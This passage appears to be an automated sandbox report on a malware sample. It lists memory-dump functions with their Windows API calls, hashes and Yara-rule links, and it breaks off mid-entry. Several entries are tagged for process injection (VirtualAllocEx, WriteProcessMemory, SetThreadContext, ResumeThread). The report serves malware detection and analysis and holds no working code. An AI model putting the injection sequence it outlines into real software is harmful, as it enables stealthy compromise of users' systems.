Function 0B4A4735, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B4A4976

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b86f235ff3b4424458d429e9907399d5d2069f3bc2a666ef4a0747ecc47312aa
Instruction ID: fa084cb2a773754d3d04ae9f813c55f80593a2250aa6d415c05810fcf723ee20
Opcode Fuzzy Hash: b86f235ff3b4424458d429e9907399d5d2069f3bc2a666ef4a0747ecc47312aa
Instruction Fuzzy Hash: 81913971D00259CFDF10CFA9D9807EEBAB2BF58314F14856AE819A7380DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0286B46A, Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0286E12A

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 027d671757564862146b8986d9699bc51c77ef0751343758a6a47dcbd5b73d2c
Instruction ID: 7b72e2d5e0fae525c5569fa4e6fb31ff094c3314fb8b026b1ea751773f3810ad
Opcode Fuzzy Hash: 027d671757564862146b8986d9699bc51c77ef0751343758a6a47dcbd5b73d2c
Instruction Fuzzy Hash: 4D7127B9D043489FDB10CFA9C888AEEBBF5FF48358F14851AE818AB210D7749945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0286BF68, Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d0a48643c2f8a7ac8c7a2fb6cda9265b9c89654036e3e8871be874009cb5f355
Instruction ID: 1018bbcd06d30abd9cf1a0173cc62527e38771d35504e5f2664420e79297f617
Opcode Fuzzy Hash: d0a48643c2f8a7ac8c7a2fb6cda9265b9c89654036e3e8871be874009cb5f355
Instruction Fuzzy Hash: 0A713674A00B058FD724DF29C54876AB7F1FF88208F00892ED58AD7A50D735E805CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02866AD6, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02867126,?,?,?,?,?), ref: 028671E7

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2aeb9ea1c7b6f9a9b971cc609e2134a0897d8783eb9d3ee9cf3fce20766de795
Instruction ID: a822dac1f6418b8d715e69f74c40ca26998fb127d77dd06326554bf208eee248
Opcode Fuzzy Hash: 2aeb9ea1c7b6f9a9b971cc609e2134a0897d8783eb9d3ee9cf3fce20766de795
Instruction Fuzzy Hash: F8611776A042988FCB00DFA8D4546ED7BF5EF89318F14809ED505EB351EB399E05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0286B4DC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0286E12A

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8ff9a707c22bbc906a69a7a2a1e777dc2486532a301df5992ef3140011f4cd42
Instruction ID: 600495ee312ba99f4b7e3ab54946f3683af27155f59bd0c4b2803760fd13e582
Opcode Fuzzy Hash: 8ff9a707c22bbc906a69a7a2a1e777dc2486532a301df5992ef3140011f4cd42
Instruction Fuzzy Hash: 6251C0B9D00309DFDB14CF99C884AEEBBB5BF48314F24812AE819AB210D7759945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0286E00C, Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0286E12A

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 378a20cad3334b62493816ff3458f4dc60b8300d9fda644be4755db2daea4a7c
Instruction ID: 895b63b88ebf598d231e92ae001cd47fea3c92601a735739302b4599aec21f44
Opcode Fuzzy Hash: 378a20cad3334b62493816ff3458f4dc60b8300d9fda644be4755db2daea4a7c
Instruction Fuzzy Hash: F851D3B5D00348DFDF14CFA9C884ADEBBB5BF48314F24862AE819AB250D7759945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A3C60, Relevance: 1.6, APIs: 1, Instructions: 90threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0B4A3D26

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 431656db5d33a8856aad29b323655a3e12456f937a94c624ba6d223c13e2d13b
Instruction ID: 292df37e7ec68472d28b4de662317bc8740eb8312133a66f1fa8b7c0e17fd2c1
Opcode Fuzzy Hash: 431656db5d33a8856aad29b323655a3e12456f937a94c624ba6d223c13e2d13b
Instruction Fuzzy Hash: 7331CB719042458FDB00CFA8C4857EEBBF0FF48318F44842AC849AB642DB38AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A4368, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da8c9d32fd0d4c16abdec7f50e0a23293405d8cd7486006110e3d1493d023c50
Instruction ID: 4ead43b16f88331538ca1aed1f54ed8040ccade7e5dbc409b88c2d448dce1b06
Opcode Fuzzy Hash: da8c9d32fd0d4c16abdec7f50e0a23293405d8cd7486006110e3d1493d023c50
Instruction Fuzzy Hash: 2D3198719042489FCB00DFA9C8446EEFBF5EF59324F15881AD865AB250CB74A911CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A43C8, Relevance: 1.6, APIs: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B4A4466

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: efaa4fbdf17368a03445a0a3f04755eb093dee5518d6680dc0bcbf466151cbaa
Instruction ID: 342904cbe6ef1540177d17f7ba3ac20cdb98619cd405f7043e5fd06ed34b7072
Opcode Fuzzy Hash: efaa4fbdf17368a03445a0a3f04755eb093dee5518d6680dc0bcbf466151cbaa
Instruction Fuzzy Hash: 1521BA718046489FCB10DFE9C8487EFBBF4EF88314F10881AD966AB250CB35A955CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A44B8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B4A4548

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7ce4475f1e3f3a437e5b3d7589fe5419eca7cc3a9eccb29f09bb6966ba4d49b0
Instruction ID: ff66a42dc9846fdd90c41952066918c31ac45dc1eca367b3c796cb88fb515ebb
Opcode Fuzzy Hash: 7ce4475f1e3f3a437e5b3d7589fe5419eca7cc3a9eccb29f09bb6966ba4d49b0
Instruction Fuzzy Hash: E52126719003599FCB10CFA9C884BEEBBF5FF48314F10842AE919A7340D7789A55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A44B0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B4A4548

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a6c850ad4005f9e41314a2ad788ca25308a5bb0681606ecef32c2aaed182705e
Instruction ID: 48230cbabd45749f766769d9995fa953c58f9bd0653911713e4d9029e1200465
Opcode Fuzzy Hash: a6c850ad4005f9e41314a2ad788ca25308a5bb0681606ecef32c2aaed182705e
Instruction Fuzzy Hash: 792148B1D002099FCB00CFA9C9847EEBBF5FF48314F00842AE918A7340D7789945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02867159, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02867126,?,?,?,?,?), ref: 028671E7

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ddf52b492efcac56d7814fd4f89b9975dd7eff233e266ac6e884a916c80dea3d
Instruction ID: 5012a212628289f9289a37d780fc24c722859a4061617bd935ab6b5812eccc7d
Opcode Fuzzy Hash: ddf52b492efcac56d7814fd4f89b9975dd7eff233e266ac6e884a916c80dea3d
Instruction Fuzzy Hash: C02114B5D002089FDB10CFA9D884AEEFBF4EB48364F14811AE918A7350D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02866B64, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02867126,?,?,?,?,?), ref: 028671E7

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e2269a12aadeb33aeb5b0792fc3641c78ccb400fd904b7d67d198b5a53337c44
Instruction ID: 6b6e50d2b978e28356381b110175f37edadc5bdd5f00a82a0f63f1b10a6e37de
Opcode Fuzzy Hash: e2269a12aadeb33aeb5b0792fc3641c78ccb400fd904b7d67d198b5a53337c44
Instruction Fuzzy Hash: E021C4B5900249AFDB10CF99D984AEEFBF8EB48324F14841AE914B7310D774A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A45A8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B4A4628

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 783b820d2af14080a1d9755cbff5e55e5ea94bc399426813dd670f893b47da23
Instruction ID: 33d9dac4afb1a7cf26b4e8a623db63eaa2f875e401b405ff21df78e8979a9355
Opcode Fuzzy Hash: 783b820d2af14080a1d9755cbff5e55e5ea94bc399426813dd670f893b47da23
Instruction Fuzzy Hash: 7C212871D002499FCB10CFA9D880BEEBBF5FF48314F50842AE919A7640D7789945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A3CA8, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0B4A3D26

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 1252c0f204394ccd666d883e1d8e8795256614a5400a3ce47911e97391f2925b
Instruction ID: 86bd221eafb6155bc5536295dddf8de2eb0bf434452cf66daddd34fe7f121741
Opcode Fuzzy Hash: 1252c0f204394ccd666d883e1d8e8795256614a5400a3ce47911e97391f2925b
Instruction Fuzzy Hash: 28213571D002088FDB10DFAAC4847EEBBF4AF48364F14842AD819A7640DB78AA45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A45A1, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B4A4628

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 918a227aea820863132b38cdc25f61a42f125e55b3a4fbce7cb9d21cb5fbab4a
Instruction ID: d3d376bff33d47392697f87daa1b7cc6917edfe68636f962a101a408c4725a0f
Opcode Fuzzy Hash: 918a227aea820863132b38cdc25f61a42f125e55b3a4fbce7cb9d21cb5fbab4a
Instruction Fuzzy Hash: AB2136B1D002499FCB00CFA9D8807EEBBF5BF48314F10842AE918A7640D7789905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0286C3C9, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0286C229,00000800,00000000,00000000), ref: 0286C43A

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a7bd1350d7f8a82401008cbc4c008288710eb6ccda427b6b5555c54c42b3e3b0
Instruction ID: a07f34843e47c00a65c2395e224e81ec59d5eca43ec3828647eb57fbee2b6c32
Opcode Fuzzy Hash: a7bd1350d7f8a82401008cbc4c008288710eb6ccda427b6b5555c54c42b3e3b0
Instruction Fuzzy Hash: 4F1114B69002488FDB10CF9AD448AEEFBF4EF88764F11842AD959A7600C775A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0286B3A0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0286C229,00000800,00000000,00000000), ref: 0286C43A

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fe09f5fc762dba68ecc9de3c228afb7f1551a588d67a444f37c9c3dfbd69354d
Instruction ID: dea5aa1d552c40e6d3145d506472fd70c0ac644356fa54d5854b7557f02efebf
Opcode Fuzzy Hash: fe09f5fc762dba68ecc9de3c228afb7f1551a588d67a444f37c9c3dfbd69354d
Instruction Fuzzy Hash: C01147BAD002488FDB10CF9AD448BEEFBF4EB48314F04842AD559B7600C774A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A43F8, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B4A4466

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4ba480a94e619cc52cc74a34a5eb986bbf227552d70da5dac7af164d8754e20e
Instruction ID: dbce7ffda033c844ddee3b1893a727652f8778c43b7ce4036fd5bed1be795a81
Opcode Fuzzy Hash: 4ba480a94e619cc52cc74a34a5eb986bbf227552d70da5dac7af164d8754e20e
Instruction Fuzzy Hash: 501137719002489FCF10DFA9D844BEFBBF9AF88324F14881AE515A7650C775A954CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0286B348, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0286BF7B), ref: 0286C1AE

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0fc530e95c45b6b5d4194b774b172ffdfe0991ea26dd86bf606d8b70f6957ebe
Instruction ID: 76ea25cc06de5e8bdf1abfd43aab9d2d01765e859e57d7fc67d42dda63792d0b
Opcode Fuzzy Hash: 0fc530e95c45b6b5d4194b774b172ffdfe0991ea26dd86bf606d8b70f6957ebe
Instruction Fuzzy Hash: 1B11F3B9D006498FDB10CF9AC448BAEBBF4AB48218F10841AD459A7600D774A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0B4AA914, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0B4AB209,?,?), ref: 0B4AB3B0

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: c6ecb512e2ae1e905f2fea6a5131d0a795b3738e04d1fea383a3d9eeca3a2cd7
Instruction ID: 84b2d79341cf984695ce9e7ff45ed75373abc16f401cac5399dcace8082b7133
Opcode Fuzzy Hash: c6ecb512e2ae1e905f2fea6a5131d0a795b3738e04d1fea383a3d9eeca3a2cd7
Instruction Fuzzy Hash: 171136B18007498FDB20DF99C444BEEBBF4EF58324F14841AD958A7740D778AA48CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A35D8, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0B4A363A

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 33e082287315207bb08aee7cee6a5e9b9717d3fb6575102428dfadd0253348e9
Instruction ID: 766b884a5d6b7a1c6893f7630cc6c353406cb32034665b83544775abaf44e85d
Opcode Fuzzy Hash: 33e082287315207bb08aee7cee6a5e9b9717d3fb6575102428dfadd0253348e9
Instruction Fuzzy Hash: 6C1158B1D002488BCB20DFAAC4447EEFBF8AF88324F10881AD519A7740DB34A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A35D0, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0B4A363A

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: db0630e153b0e0f2ccbfce89c90ec0f3cc9221afd5defd7b653c429d7791cc84
Instruction ID: 734743da0a572e9ca0dac3600aad47a08435bd2d0703ed1954c4c62c2fc17fa8
Opcode Fuzzy Hash: db0630e153b0e0f2ccbfce89c90ec0f3cc9221afd5defd7b653c429d7791cc84
Instruction Fuzzy Hash: A11158B1D002488BDB20CFA9C8447EEBBF4AF58318F14881AD519B7740D735A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0286E258, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0286E248,?,?,?,?), ref: 0286E2BD

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: ee3516790f3adb21de018eddfd169d267643b625ea5a5ec372e50640f7870fb4
Instruction ID: 4a2d189b04be16b7f30238885611c968912303eef315769dc95e87ed42f592e3
Opcode Fuzzy Hash: ee3516790f3adb21de018eddfd169d267643b625ea5a5ec372e50640f7870fb4
Instruction Fuzzy Hash: EB1118B99006499FDB10CF99D589BEFBBF4EB48324F108419E958B7740C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0286B514, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0286E248,?,?,?,?), ref: 0286E2BD

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 975a1e9c55a51730694d61666cf994307295868a36d82fe2fc468b118966cb01
Instruction ID: b01d8b17315b529368535e199dd18f7d8111b7093993192313909e5c75139e16
Opcode Fuzzy Hash: 975a1e9c55a51730694d61666cf994307295868a36d82fe2fc468b118966cb01
Instruction Fuzzy Hash: F01103B99006489FDB10CF99D588BEFBBF8EB48324F10841AE919B7700D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0B4AB352, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0B4AB209,?,?), ref: 0B4AB3B0

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8e100bcbd496a60aa0be354ff1bcb06d5e715dfbe9d4b24ab67aad2e876cd8dc
Instruction ID: bc0180a5d0831a18171a6d6623a9512f1b400d84739dac8134bec5fdadc76c25
Opcode Fuzzy Hash: 8e100bcbd496a60aa0be354ff1bcb06d5e715dfbe9d4b24ab67aad2e876cd8dc
Instruction Fuzzy Hash: B01133B6C006098FCB10DF99C585BEEBBF4EF58324F15841AD558A7740D738AA48CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A98D8, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B4A993D

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ebf2e03a7cae820c687383b850ecebcae9c280f80d331613b270a648818adc83
Instruction ID: 74030ff803af644d5045961c5686655e85e209254778ec4580de02e03b6e212b
Opcode Fuzzy Hash: ebf2e03a7cae820c687383b850ecebcae9c280f80d331613b270a648818adc83
Instruction Fuzzy Hash: 601103B68006499FDB10CF99D585BDEBBF8EB58324F10840AE514B7700C374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A98E0, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B4A993D

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 68cb38341ef54951aeff812a13734abc2e693f6881b75346fa9463ce0b299c9c
Instruction ID: 40632360e38b654914d76631d165966361ec0525a899e305e8d06779fbab5e1a
Opcode Fuzzy Hash: 68cb38341ef54951aeff812a13734abc2e693f6881b75346fa9463ce0b299c9c
Instruction Fuzzy Hash: E511E2B58007499FDB10CF99D885BDFBBF8EB48724F10841AE558A7700C375AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0286E2F1, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0286E248,?,?,?,?), ref: 0286E2BD

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 8811e7dcf89537971f2ea6422adc974105f9df7753af07b29d7cab4bf3e2c0c5
Instruction ID: 04efd72b0fadffc7b8c15cb67d217664b9160e4b2db68760e1ab541d6726fec2
Opcode Fuzzy Hash: 8811e7dcf89537971f2ea6422adc974105f9df7753af07b29d7cab4bf3e2c0c5
Instruction Fuzzy Hash: 39F0E57D9043444FDB219768D4093D9BBE1AF46328F114097C384D7292C3B95858CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327127795.0000000000FCD000.00000040.00000001.sdmp, Offset: 00FCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5403af1c986a73cd17b8e77c72b8849fda231a2b2287d5061ca66bee0cd8f11
Instruction ID: d067adc3e7314cf6b47e91c1b70548a1fbb0c45371a45ae23c0a391588e2c6f2
Opcode Fuzzy Hash: d5403af1c986a73cd17b8e77c72b8849fda231a2b2287d5061ca66bee0cd8f11
Instruction Fuzzy Hash: C5212876504241DFCB05CF14DAC1F2BBB65FB88328F28897DE9054B246C336D846EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 025FD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327164366.00000000025FD000.00000040.00000001.sdmp, Offset: 025FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63f3247a42e867866c52cf302366758b9f166a2bb5934c6086ad42783bd3d858
Instruction ID: 424ae898e6a47a37181cb7734a40a912cf8e12aa2bc2d0d7d69342f8085776d8
Opcode Fuzzy Hash: 63f3247a42e867866c52cf302366758b9f166a2bb5934c6086ad42783bd3d858
Instruction Fuzzy Hash: 22214271104240DFDB50CF14D8C0B26BBB9FB88314F20C969EA0A4BB46D33AD846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 025FD006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327164366.00000000025FD000.00000040.00000001.sdmp, Offset: 025FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9a2cdb11127c558af3dff27f8fa1bb843b4d34edc0cf7341281126384e8e60a
Instruction ID: b7d4489e3cf7cc3750bd60846b131c0b9aeef19ccc02f4b9248d4ca426ff93c8
Opcode Fuzzy Hash: b9a2cdb11127c558af3dff27f8fa1bb843b4d34edc0cf7341281126384e8e60a
Instruction Fuzzy Hash: 182162755093C08FCB12CF24D594715BF71FB46214F28C5EAD9498F657C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327127795.0000000000FCD000.00000040.00000001.sdmp, Offset: 00FCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afa457568e0bb640a5e96658e9777ab49a47e984ab559958fa4953148591eca
Instruction ID: 0800ac1da289720a3d0d8925c97bb9a3d940f22d4476b000edd3e3fda8ca557d
Opcode Fuzzy Hash: 2afa457568e0bb640a5e96658e9777ab49a47e984ab559958fa4953148591eca
Instruction Fuzzy Hash: 9C11D376904280DFCB15CF10DAC4B1ABF71FB94324F2886ADD8090B656C33AD85ADBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD749, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327127795.0000000000FCD000.00000040.00000001.sdmp, Offset: 00FCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 498fd9d88aaeeef02df3a4b525020efa5727dfb768ec05a3b0198b851b8df7ba
Instruction ID: 92926dcdb1314452b8fa4825bf8adb741e175367f238728606b967f1cf3e4ad4
Opcode Fuzzy Hash: 498fd9d88aaeeef02df3a4b525020efa5727dfb768ec05a3b0198b851b8df7ba
Instruction Fuzzy Hash: 1701D472408341AAE7204A15DE85F6ABB9CEF41778F18C52EE9045A242D3799C44E6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD748, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327127795.0000000000FCD000.00000040.00000001.sdmp, Offset: 00FCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b877ecf687ef9da3e34819aeacfdf17a08515459018aa89fdeffeb0e0709c99
Instruction ID: fe626679921ac25e93c043dee2c2930bb5cfbf98efecb526f19c93e9706d835e
Opcode Fuzzy Hash: 1b877ecf687ef9da3e34819aeacfdf17a08515459018aa89fdeffeb0e0709c99
Instruction Fuzzy Hash: 81F06271404344AAE7248A15DD85B66FB9CEF41774F18C46EED085B286C3799C44DAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0B4A1DD0, Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

s, xrefs: 0B4A202C
d<, xrefs: 0B4A1EC2
s, xrefs: 0B4A2025

Memory Dump Source

